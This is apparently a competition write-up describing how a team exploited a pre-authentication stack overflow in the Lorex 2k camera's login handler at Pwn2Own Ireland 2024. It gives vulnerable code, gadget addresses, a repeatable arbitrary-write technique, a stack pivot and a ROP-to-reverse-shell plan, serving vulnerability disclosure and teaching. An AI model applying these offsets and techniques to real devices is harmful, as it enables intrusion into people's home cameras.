Introduction
In October InfoSect participated in Pwn2Own Ireland 2024 and successfully exploited the Sonos Era 300 smart speaker and Lorex 2k Indoor Wifi security camera.
The competition featured a wide variety of targets, including routers, surveillance systems, printers, smart speakers, and other SOHO (small office/home office) devices.
In this blog I will detail exploitation of the pre-authentication stack-based buffer overflow in the Lorex camera found by team member Rami.
Vulnerability
The vulnerability exists in the sonia binary, which handles a majority of services and functions of the device. The pre-authenticated login handler of a custom binary protocol (port 35000) contains a stack-based buffer overflow when copying the user-provided username and password to fixed-sized stack buffers without any bounds checks.
The custom protocol handles messages according to dpmessage structures. These contain the message ID and various function callbacks to enable message handling. For the Login message type this structure is:
struct dpmessage Login = { int32_t id = 0x2 void* probe = Login_probe void* parse = Login_parse void* package = Login_package void* alloc_param = Login_alloc_param void* free_param = Login_free_param struct dpmessage* next = 0x0 }
The callback Login_parse (0x0038cf08) is called from dpsession_handleInput (0x0034a47c) to parse user-provided input:
int32_t Login_parse(struct dpstack* dpstack, struct LoginReq* req) { ... int32_t cmd_b0b1 = dpstack->hdr.cmd[1]) & 2; int32_t zero = cmd_bit1 & 0xff; if (cmd_bit1 == 0) { char username[0x80]; memset(&username, zero, 0x80); char password[0x80]; memset(&password, zero, 0x80); if (dpstack->hdr.len != 0) { struct ABuffer* buf = dpstack->buf; char zero_ = ((int8_t)zero); buf->Append(buf, &zero_, 1); char* data = buf->Data(buf); int32_t len = dpstack->hdr.len; if (data == 0) return -1; char* pos_separator = strstr(data, "&&"); char* pos_null = strchr(data, zero); if (((pos_separator == 0 || pos_null == 0) || pos_separator > pos_null)) return -1; memcpy(&username, data, (pos_separator - data)); // [1] char* pos_separator2 = strstr(&pos_separator[2], "&&"); void* password_len; if (pos_separator2 == 0) password_len = (pos_null - &pos_separator[2]); else password_len = (pos_separator2 - &pos_separator[2]); memcpy(&password, &pos_separator[2], password_len); // [2] if ((len > (pos_null - data) && dpstack_extractParam(&pos_null[1], "Random", &req->random, 0x100) < 0)) { puts("--UserLogin//:error extra data1 "); return -1; } } ... strncpy(&req->username, &username, 0x1f); strncpy(&req->password, &password, 0x7f); } else { ... } return 0; }
For each request, user data is saved into a dpstack structure containing a header (the first 0x20 bytes of the user packet) and the main content of the packet (stored in an ABuffer structure). In Login_parse, this main content is accessed via the data variable from dpstack->buf->Data(buf). This data is expected to contain a username and password string, separated by a "&&" delimiter, and possibly optional "random" data. At [1] all data up to the first delimiter (username) is copied to a fixed stack buffer of size 0x80, resulting in a potential buffer overflow. At [2] remaining data up to the second delimiter or null byte (password) is copied to a separate fixed stack buffer of size 0x80, resulting in a second potential buffer overflow.
Given the ability to overflow onto the stack, one would imagine exploitation would be extremely straightforward. However, there were a range of constraints that complicated exploitation.
Exploitation environment
For development and testing we would ideally run our target in a debugger to enable detailed dynamic analysis. However, the Lorex camera is highly locked down. First, it is difficult to gain unrestricted shell access to the system. Second, once you do get a shell you only find a bare bones Busybox Linux system with no useful tool for downloading files, compiling code, or inspecting data (i.e. wget, nc, curl, bash, xxd, or even dd). Third, once you attempt to run binaries added to the device through an external SD card, you encounter some form of application whitelisting implemented by the modified kernel.
We were able to bypass the application whitelisting using the LD_PRELOAD technique as detailed by Rapid7. This allowed for limited code execution of custom compiled shared objects, which we used to obtain process memory dumps. We were not able to run a standard debugger, which would require compiling or transforming common binaries into shared objects compatible with uClibc.
One of our hardware team members was able to hook up a serial console via UART. This provided a login prompt to a restricted shell, but also to a stream of debugging information that ended up being extremely useful. Particularly, every time a process crashes there is a dump of the process register state and stack values at the time of the crash. This made it easier to identify the point of failure of a developmental exploit. Without this feedback, exploit development would have been significantly hampered.
Exploitation constraints
The sonia binary is not position independent (PIE) and only has partial RELRO, so the placement of the main binary is known without a leak. ASLR was enabled and appeared to suitably randomise the load address of every library.
Without an additional leak, we are quite heavily constrained in achieving a useful effect:
- We know only the load address of the main binary, for
which all memory contains a high null byte (ex.
0x0032fd3c
). - Our overflow occurs via memcpy, but the range is calculated using string functions. This results in the constraint that the overflowed data can only contain non-zero characters, and is the worst of both worlds: usually you might have the range calculated using strlen, then copied via strcpy, which is advantageous for this scenario because the strcpy will write a terminating null byte; alternatively, you might have an overflow that only uses memcpy, which will allow for copying all bytes including nulls.
Therefore, at most we can only write one pointer to known memory as part of our overflow, by performing a partial overflow of a value whose high byte is already null. This means a standard ropchain is out of the question, and even adequately hijacking control flow will be difficult as we only get access to one standard gadget.
Memory state
To better assess our possibilities, we would like a good idea of the memory state of the program: are there any interesting pointers residing in registers, or sitting on the stack at the point of the overflow or subsequent function return? Vulnerable function Login_handle has two main return paths after the overflow occurs, for when a subsequent parsing error occurs or not. The possible register states on returning from the vulnerable function are:
return -1 r11: GOT address r10: .data pointer to "cmd 0x%02x dataLen %d, cost time %llu" r4-r9: clobbered/controlled by the overflow r3: 0x1 r2: 0x1 r1: 0x0 r0: -0x1 return 0 r11: GOT address r10: .data pointer "cmd 0x%02x dataLen %d, cost time %llu" r4-r9: clobbered/controlled by the overflow r3: 0xae321a: this is a heap pointer to the end of the strncpy dst pointer (req->password) r2: 0x0 r1: 0xb4d27c6f == SP-0x21: this is offset 0x7f into the password string stored on the stack, which is the updated src pointer to the strncpy call r0: 0x0
Unfortunately we only have immediate access to two useful pointers when returning without error. One is a pointer to the username stack buffer at offset 0x7f (the final source for the strncpy) and the other is a heap pointer to the destination heap chunk. But both of these regions only contain string data without nulls, so we cannot store further ROP pointers here.
Failed strategies
A range of strategies were attempted and eventually discarded. These included:
- Standard ropchain
- We can only write one pointer via a partial overflow. Control of registers r4-r8 would only allow possibly one further bx rn gadget.
- Pivot back into a ropchain stored in user input
- We lose the pointer to our raw input in r7, and retrieving it requires multiple dereferences of a session pointer. There is always the possibility of returning to user input that has been stored in .bss through a separate application request, although we would need additional reversing to find these possibilities.
- Partial overwrite of a register saved on the stack, rather than hijacking control flow
- The only useful values we can overwrite are heap pointers, which have non-null high bytes. There is potential to partially overwrite one of these saved heap pointers to redirect it to a nearby fake heap object, but we would ideally prefer a more straightforward path.
- One-shot return to useful function call in program
- With a one-shot attempt we must ensure we create a significant effect. With the locked down nature of the system, lack of useful programs, and the small payload size, I could not find anything useful to do with a one-shot system call. In other circumstances we might be able to enable a telnetd instance or change a password to an existing service. Unfortunately our useful pointer in r1 is too close to the top of the stack frame, meaning that any subsequent function call will clobber our user data. Given the immense size of the sonia binary, there are likely to be novel one-shot locations specific to the application, which might be found through additional reversing.
- Stack pivot + program restart
- This requires a very specialised gadget to pivot and then return to an appropriate location. It also requires finding a location that can successfully restart the program, noting that it will be called from just one of many active threads.
We then considered the idea of incremental exploitation: finding ways to perform a small effect while preserving the application state/availability to enable further effects.
Incremental exploitation
The underlying motivation for this idea is the technique of returning to a higher stack frame after exploitation to not only prevent an application crash but maintain service availability (for example, after hijacking code execution and executing a system call). Instead of using this as a post-exploitation technique, can we turn this into part of the exploitation?
The key idea is that we can effectively use anything in the program as a gadget as long as it allows us to successfully return into a higher function in the call stack below the main service handler. This means avoiding the use of any of the clobbered registers, but allows us to re-use program code that may not otherwise be thought of as a gadget. Then, all we need to find is a target location with a minor effect (such as a small arbitrary write) that can then be repeated.
The call stack for our vulnerable function is as follows:
- _AedaServiceContainer_ThreadProc_1ab5f4
- call_AedaService_Handle_1ab5a4
- AedaService_Handle_1a2304
- netmux_rectifier_on_event
- lock_callr3_19ecd6
- _netmux_rectifier_on_event_refence_helper
- dpsession_onNetMuxRecv
- dpsession_handleInput
- Login_parse
By considering/combining the effects of these functions on the stack pointer, and the use of saved registers in the stack, we can derive the following 'effective' epilogues for a pseudo gadget that would allow us to restore saved registers from the stack and return to one of these callers:
add sp, #0x1fc ; pop {r4-r11, pc}
add sp, #0x198 ; pop {r3-r7, pc}
add sp, #0x174 ; pop {r4-r11, pc}
add sp, #0x134 ; pop {r4-r7, pc}
add sp, #0xf0 ; pop {r3-r7, pc}
add sp, #0xdc ; pop {r4-r7, pc}
add sp, #0x84 ; pop {r4-r11, pc}
add sp, #0x28 ; pop {r4-r8, pc}
There is some flexibility in these effective epilogues if the return points in these functions don't critically rely on values in the lowest saved registers (for example, we might be able to use add sp, #0x88; pop {r5-r11, pc} in addition to add sp, #0x84; pop {r4-r11, pc}).
For context, given the large size of the sonia binary there were many functions sharing the above epilogues, with many potential return points to consider per function. For example, there were 71 functions sharing the add sp, #0x28 ; pop {r4-r8, pc} epilogue.
Hope
While considering the available options I thought I had a viable strategy to return to a location that uses our user data pointer in r1 as the format argument to vsnprintf. This would allow us to repeatedly use format string payloads to perform a sequence of arbitrary writes. For example, we can jump into the middle of the code setting up arguments for a call to logging function 0x1a6900 at 0x104aa8. This writes r1 (our source pointer from the password saved on the stack) to param6, which will then be used as the format argument to vsnprintf. Unfortunately, because our pointer sits near the top of the stack, the act of calling any function clobbers our intended data.
Continuing on, as I reached the end of all possible return locations I realised I would have to try harder to find a useful instruction. I began considering the potential for uncovering unexpected instructions by returning to the middle of a 4 byte instruction. This is a common strategy for x86 - being a variable length CISC instruction set - and any gadget finder will find these for you. This has less potential for ARM, as instructions are aligned and have fixed widths of either 2 or 4 bytes. However given the variability in instruction size, we can jump 2 bytes into a 4 byte instruction to uncover a new unintended instruction.
After considering a number of other locations, at address 0x26468 I disassembled the beautiful instruction STRH r7, [r6, r7]. This stores a halfword from register r7 to the memory address r6+r7. By overflowing the addition of the r6 and r7 registers we can derive a target address containing a high null byte. This is exactly what we need, as it allows for an almost arbitrary write using registers we control. As this sits within a function with the epilogue add sp, #0x174 ; pop {r4-r11, pc}, we can successfully return to call_AedaService_Handle_1ab5a4 to recover gracefully after having hijacked control flow, thereby enabling repeated arbitrary writes (noting that there are some constraints and we cannot write null bytes).
Here is a comparison of the intended instruction against the intermediate instruction:
Also note that we can gracefully pass through the subsequent function call to audlog.
Next steps
With a repeatable arbitrary write the sky is the limit. I first considered lower impact options such as rewriting GOT entries, but eventually settled on a 'standard' exploitation strategy as follows:
- Find a stack pivot to unlock a traditional ropchain
- Develop a ropchain to make memory executable and jump to shellcode
- Develop shellcode to achieve a reverse shell
- Write the stack pivot data, ropchain and shellcode to a known location in .bss and employ the stack pivot
For reference, rewriting GOT entries was discarded because I could only find very standard functions to replace, and doing so would have consequences for the many other threads/services the sonia binary was handling.
Stack pivot
Finding a usable stack pivot proved a challenge, though not as hard as finding the write primitive. As the program executes primarily in THUMB mode without using a frame pointer, I could not find any stack pivots in the 128k THUMB gadgets available. However, given the architecture we are lucky to also be able to consider gadgets by interpreting memory in ARM rather than THUMB mode (which is controlled by the low bit of the instruction address). This unlocks an additional 29k ARM gadgets, many with the form ldm rn, {..., sp, pc}. After 100 or so results of the regex r[4-9], r[4-9].+ldm.+\{.+sp,.+\} I revealed a suitable gadget:
rsbseq r0, r8, r4, asr ip ; movwhs lr, #0x9d1 ; ldmib r0, {r4, r5, r8, sl, ip, sp, pc}.
This calculates a pointer into r0 as r0 = (r4 >> ip.lo) - r8. Given our value of ip, we can effectively set this calculation to r0 = 0 - r8, letting us derive a pointer with a high null byte (a known area of .bss) from which to load a new stack pointer.
ROPchain
The ropchain is pretty standard. Because sonia itself does not use mprotect, I load the GOT entry for mmap and then add the LIBC offset to derive the location of mprotect in libc.
Shellcode
The shellcode was a bit of pain because the most basic reverse shell (connect+dup+execve) immediately causes a kernel OOPs. I was unsure why this was, but suspected we might need to provide a valid arg and env pointer to execve. However, this still resulted in a kernel OOPs. After reviewing the uses of execve within sonia, I added a fork and then was able to cleanly open a reverse shell.
The Experience
Attending the competition in person was a blast, although it was not without high stress and drama. When competing in Pwn2Own there are three big worries from the moment you have a bug:
- Vendors might release a new firmware version days before the competition that patches your bug.
- Vendors might release a new firmware version days before the competition that requires you to completely redevelop your exploit.
- The device you have developed your exploit for might somehow not match the device used in the competition.
InfoSect received the full Pwn2Own experience, with each of these occurring across the 3 devices we were targeting. For the Lorex, we received the firmware version of the target devices 2 days before the competition. The competition device was running firmware version 2.800.020000000.3.R.20220331, but our device was running firmware version 2.800.030000000.3.R.20220331! Given the build date, it seemed likely that our device was not running updated firmware, but rather an alternate build (possibly for a slightly different model, vendor, or region).
For two days I was anxious that the exploit would fail because it relied on hardcoded offsets for both sonia and uClibc. We tried to source local devices, but none were available. A day before our exploit attempt we obtained the version 2 sonia binary from a very kind competitor. This gave us very good news: the binary was almost identical to version 3, and differed only in a few strings regarding PAL vs NTSC video standards.
On the day of our attempt we were hopeful our exploit would succeed, but it had still been untested against a version 2 device, and we weren't completely certain that this version used an identical uClibc. In the 30 minutes leading up to our exploit attempt I was still trying to rewrite my ropchain to execute a mprotect system call install of a library call, but was hampered by the minor constraints of the 'arbitrary' write (the inability to write a single non-null byte surrounded by null bytes).
I tried to maintain my composure when the attempt began, taking care to ensure everything was set up correctly before firing the exploit. We then waited with bated breath for one minute while the exploit performed the 80+ writes. Then there was relief when we got our shell!
Conclusion
All in all, it was an amazing experience to participate in Pwn2Own, and the event was very well run. Some lessons learned for future events:
- There are many factors outside your control. Expect things to go wrong.
- Try to have backup bugs/exploits so you can respond to last minute changes.
- It can be a stressful experience, even when you know you have a completely reliable and stable exploit.
- Buy your devices from the same region as the ZDI purchasing office!
Huge respect to all competitors and hope to see you in future.